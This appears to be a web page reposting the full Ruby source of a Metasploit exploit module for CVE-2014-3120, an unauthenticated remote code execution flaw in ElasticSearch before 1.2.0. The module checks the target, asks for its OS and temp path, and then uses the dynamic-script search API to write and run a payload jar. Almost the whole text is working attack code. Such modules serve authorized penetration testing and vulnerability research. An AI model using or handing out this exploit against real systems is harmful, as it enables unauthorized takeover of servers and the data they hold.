ElasticSearch Dynamic Script Arbitrary Java Execution

Bài liên quan

##

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

 

require 'msf/core'

 

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

 

  include Msf::Exploit::Remote::HttpClient

  include Msf::Exploit::FileDropper

 

  def initialize(info = {})

    super(update_info(info,

      'Name'           => 'ElasticSearch Dynamic Script Arbitrary Java Execution',

      'Description'    => %q{

        This module exploits a remote command execution vulnerability in ElasticSearch,

        exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the

        REST API, which requires no authentication or authorization, where the search

        function allows dynamic scripts execution, and can be used for remote attackers

        to execute arbitrary Java code. This module has been tested successfully on

        ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.

      },

      'Author'         =>

        [

          'Alex Brasetvik',     # Vulnerability discovery

          'Bouke van der Bijl', # Vulnerability discovery and PoC

          'juan vazquez'        # Metasploit module

        ],

      'License'        => MSF_LICENSE,

      'References'     =>

        [

          ['CVE', '2014-3120'],

          ['OSVDB', '106949'],

          ['EDB', '33370'],

          ['URL', 'http://bouk.co/blog/elasticsearch-rce/'],

          ['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch']

        ],

      'Platform'       => 'java',

      'Arch'           => ARCH_JAVA,

      'Targets'        =>

        [

          [ 'ElasticSearch 1.1.1 / Automatic', { } ]

        ],

      'DisclosureDate' => 'Dec 09 2013',

      'DefaultTarget' => 0))

 

      register_options(

        [

          Opt::RPORT(9200),

          OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]),

          OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ])

        ], self.class)

  end

 

  def check

    result = Exploit::CheckCode::Safe

 

    if vulnerable?

      result = Exploit::CheckCode::Vulnerable

    end

 

    result

  end

 

  def exploit

    print_status("#{peer} - Trying to execute arbitrary Java..")

    unless vulnerable?

      fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")

    end

 

    print_status("#{peer} - Asking remote OS...")

    res = execute(java_os)

    result = parse_result(res)

    if result.nil?

      fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...")

    else

      print_good("#{peer} - OS #{result} found")

    end

 

    jar_file = ""

    if result =~ /win/i

      print_status("#{peer} - Asking TEMP path")

      res = execute(java_tmp_dir)

      result = parse_result(res)

      if result.nil?

        fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...")

      else

        print_good("#{peer} - TEMP path found on #{result}")

      end

      jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"

    else

      jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar")

    end

 

    register_file_for_cleanup(jar_file)

    execute(java_payload(jar_file))

  end

 

  def vulnerable?

    addend_one = rand_text_numeric(rand(3) + 1).to_i

    addend_two = rand_text_numeric(rand(3) + 1).to_i

    sum = addend_one + addend_two

 

    java = java_sum([addend_one, addend_two])

    res = execute(java)

    result = parse_result(res)

 

    if result.nil?

      return false

    else

      result.to_i == sum

    end

  end

 

  def parse_result(res)

    unless res && res.code == 200 && res.body

      return nil

    end

 

    begin

      json = JSON.parse(res.body.to_s)

    rescue JSON::ParserError

      return nil

    end

 

    begin

      result = json['hits']['hits'][0]['fields']['msf_result'][0]

    rescue

      return nil

    end

 

    result

  end

 

  def java_sum(summands)

    source = <<-EOF

#{summands.join(" + ")}

    EOF

 

    source

  end

 

  def to_java_byte_array(str)

    buff = "byte[] buf = new byte[#{str.length}];\n"

    i = 0

    str.unpack('C*').each do |c|

      buff << "buf[#{i}] = #{c};\n"

      i = i + 1

    end

 

    buff

  end

 

  def java_os

    "System.getProperty(\"os.name\")"

  end

 

  def java_tmp_dir

    "System.getProperty(\"java.io.tmpdir\");"

  end

 

 

  def java_payload(file_name)

    source = <<-EOF

import java.io.*;

import java.lang.*;

import java.net.*;

 

#{to_java_byte_array(payload.encoded_jar.pack)}

File f = new File('#{file_name.gsub(/\\/, "/")}');

FileOutputStream fs = new FileOutputStream(f);

bs = new BufferedOutputStream(fs);

bs.write(buf);

bs.close();

bs = null;

URL u = f.toURI().toURL();

URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});

Class c = cl.loadClass('metasploit.Payload');

c.main(null);

    EOF

 

    source

  end

 

  def execute(java)

    payload = {

      "size" => 1,

      "query" => {

        "filtered" => {

          "query" => {

            "match_all" => {}

          }

        }

      },

      "script_fields" => {

        "msf_result" => {

          "script" => java

        }

      }

    }

 

    res = send_request_cgi({

      'uri'    => normalize_uri(target_uri.path.to_s, "_search"),

      'method' => 'POST',

      'data'   => JSON.generate(payload)

    })

 

    return res

  end

 

end